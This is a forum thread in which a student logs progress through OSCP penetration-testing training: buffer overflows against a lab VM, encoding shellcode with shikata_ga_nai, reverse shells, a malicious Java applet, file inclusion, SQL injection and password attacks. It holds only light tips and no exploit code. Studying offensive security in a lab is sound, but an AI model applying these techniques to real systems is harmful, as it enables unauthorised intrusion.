Need a project - Found a project! YFZblu's OSCP Thread

YFZblu

JoJoCal19 wrote: »

That just blew my mind. Even though I have no desire to be a straight pentester, that's the kind of stuff that intrigues me and makes me want to pursue the OSCP. Partly for self gratification and partly because I'd like to at least have some job duties to take advantage of doing that sort of thing. Thanks for the update.

exe2bat blew my mind as well, really interesting tool

YFZblu

Today I grabbed a 5 subject notebook - I'll be splitting it into sections and it will act as a command/tools reference for certain stages of engagement - recon, exploitation, file transfer, privilege escalation, etc etc. That way I don't have to keep referring to the book each time I need the command to do something.

wes allen

I had a sublime text tab open with a bunch of common commands, commented like code with ## above them.

RTFM book is a nice reference as well.

YFZblu

Actually, Sublime Text is a much better idea. That way I can copy pasta some of the obvious stuff.

Minor rant about reverting my Windows lab machine:

Sorry, no more reverts left, please contact an administrator or staff member

Is there a good reason for this? I feel like reverting the box should be a non-issue. Basically, as I fumble around Immunity Debugger like an idiot, I might accidentally close one of the windows or get them re-arranged; and therefore unreadable. I wasn't able to find a way to put them back to the default settings, so I had to revert the machine several times. I don't know, that kind of irritated me tonight. I also don't like the way VMWare Player is behaving when running Ubuntu as the host operating system. I typically use Virtualbox and never had issues. I used VMWare Player only because the Offsec docs specified a VMWare image.

/rant

I spent a couple hours re-reading the buffer overflow module and completing the activities. The study time I put into C and some light assembly reading definitely paid off, I feel good about it. I even found myself being slightly resourceful when I noticed msfencode was trying to encode my shellcode in something powershell related by default - It made my payload far too large for the buffer I created in the vulnerable application. Using the -e flag I was able to specify the 'x86/shikata_ga_nai' encoder and things worked out. I didn't have that issue the first time around several weeks ago.

Anyway, I think I'm beat for the night. Tomorrow I'll dig into client-side recon / attacks and post another update.

NovaHax

Totally agree man. I understand them rate limiting your reverts on shared lab boxes...but I don't see any reason why you should be restricted on your dedicated Windows VM.

YFZblu

So, back when I originally started this training, I wasn't that comfortable with the buffer overflow portion of the program. As a result, after the buffer overflow walkthroughs were completed, I skipped the exercise that asked me to tak PoC code, modify it to work, and compromise my Windows lab workstation running a vulnerable process (VulnServer.exe). That was bothering me because I felt dishonest in moving on. I also feared that I might skip other modules as the course wore on...so I went back and tackled the exercises - watching the remote shell pop up on my Kali machine was one of the more gratifying things I've experienced while studying anything.

If it sounds like I'm going forward, then losing ground, then going forward again, I think the problem is that I never moved forward to begin with. I consider myself to be a technical person, and I wasn't being honest with myself when confusion set in early on. Ultimately, I think I underestimated this course big time and it humbled me.

I finally feel like the hard work is paying off, and I'm beginning to understand the 'Try Harder' mindset. At this point I'm more determined than ever to master the material and eventually pass this exam.

cyberguypr

That's great. Keep momentum going!

YFZblu

Thanks for the kind words everyone - I'm plugging along again tonight, this time modifying the ready-made C exploits for the buffer overflow exercises. Even though I know exactly what these exploits are doing because of the previous lab with Python, it takes some tweaking to slog through the C code and modify it for my environment. OffSec drives home the point that even though PoC exploit code is available online, it will take some 'massaging' to make it work for my target.

I was fortunate to have some knowledge of C going in; which makes this less painful than it would have been otherwise in terms of understanding what the code is doing - As opposed to just subbing my own shellcode in and pressing the button without actually 'getting it'. There's plenty of time for mindlessly glossing over the code during the Java exercises later...*barf*

Again, seeing the reverse shell pop up on my Kali box was extremely rewarding. Additionally, compiling an executing a Windows binary from my Linux box was really cool.

YFZblu

Read through the file transfer portion of the post-exploitation module. Next up: Client-side attacks.

I don't think I'm going to do much tonight, I'm feeling pretty tired and burnt out. Time for a break!

YFZblu

Woke up early on one of my days off - I'm hoping to kill a large portion of the training over the next few days. That way I can take several days to get some scripts together to automate the process of recon and complete the writeup of my exercises. At this point I'd rather not purchase another extension - I do have plenty of time, approximately 20 days

MSP-IT

Are we required to complete a writeup for all of the lab machines or just the exam alone?

Killj0y

Both really. It is suppose to help for extra credit on the exam.

YFZblu

Yeah - I actually read an OSCP blog that stated people have passed the exam even though they didn't technically score enough points during the test because their extra credit gave them the necessary bump. Obviously that's not an ideal situation, but I'd like every point possible.

MSP-IT

Makes sense. I don't have my materials in front of me for reference.

YFZblu

Completed the privilege escalation module - Very basic IMO, but provides a solid thought process you can go through to get things started. I'm sure an entire book can be written about escalation alone.

Next up is client-side recon and attacks, which should be a nice read. It looks like there's a Java payload in here, which I see at work quite a bit in the context of drive-by downloads and exploit kit interaction.

YFZblu

Finished up client-side attacks. I must say, I really hate working with Java. Creating a malicious Java applet was the one exercise in which I didn't care to ask "why?", or really have interest in what it was actually doing at a lower level. I'm happy to be over it. At work I have done some research which included a Java downloader, and for some reason it always leaves a bad taste in my mouth. That being said, it's important to recognize the value of another tool for the toolbox.

Also it appears the Offsec book contains a typo. Java executes 'cmd /c' at one point, but the 'c' parameter should be capitalized. My payload wasn't running and it took me a bit to find that.

ramrunner800

YFZblu wrote: »

Also it appears the Offsec book contains a typo. Java executes 'cmd /c' at one point, but the 'c' parameter should be capitalized. My payload wasn't running and it took me a bit to find that.

I'm not at that exercise yet, but I'm not a Java guy, and I have a feeling that is going to be an extremely valuable piece of information. Thank you!

wes allen

YFZblu wrote: »

Also it appears the Offsec book contains a typo. Java executes 'cmd /c' at one point, but the 'c' parameter should be capitalized. My payload wasn't running and it took me a bit to find that.

You sure it is a typo and not a learning opportunity? The FTP script for PWB also had a "typo" in it as well.

MSP-IT

OffSec loves "learning opportunities"

YFZblu

wes allen wrote: »

You sure it is a typo and not a learning opportunity? The FTP script for PWB also had a "typo" in it as well.

You're right, I have encountered that situation a few times now - I can see that being the case

YFZblu

Ran a few errands this morning, I have a few hours to dig in - I'm going to get started with Web Application Attacks

YFZblu

Local File Inclusion was another exciting moment for me, similar to the Buffer Overflow module. Mostly because of the method by which we inject our own code into the web server's file system. Really clever.

YFZblu

I got a bit hung up on SQL Injection - I'm probably fried. Going to call it a night, and restart SQLi tomrorow.

MSP-IT

What did you think of the buffer overflow and reverse payload script? I'll definitely need to go through that one more than once.

YFZblu

Loved it - It was the first really humbling experience I had and is quite literally the reason I stopped. Eventually I got my head together and went back at it, was able to digest it and complete all of the exercises. Great feeling!

YFZblu

Chipping away at SQLi again today. A fresh state of mind really helps, I'm clicking along nicely.

YFZblu

Unfortunately I did not get SQLi done yesterday - I'm working all day today (bleh), and I'll finish it tonight. From there, we get into password attacks.

YFZblu

I got antsy with a slow day at work - Went home, grabbed my Macbook Air / OffSec materials, and decided to try to tether my phone to use the lab environment - So far so good. DL speed of 12Mbps (per speedtest.net) isn't terrible, I'll let you all know if it holds.

YFZblu

Finished up SQLi today, I actually got a lot done at work this afternoon and tethering on my phone worked really well in a pinch.

YFZblu

Finished the first exercises for Password Attacks. I'm pretty sure I just felt the moment my brain melted; I've been at this all day. Shutting it down.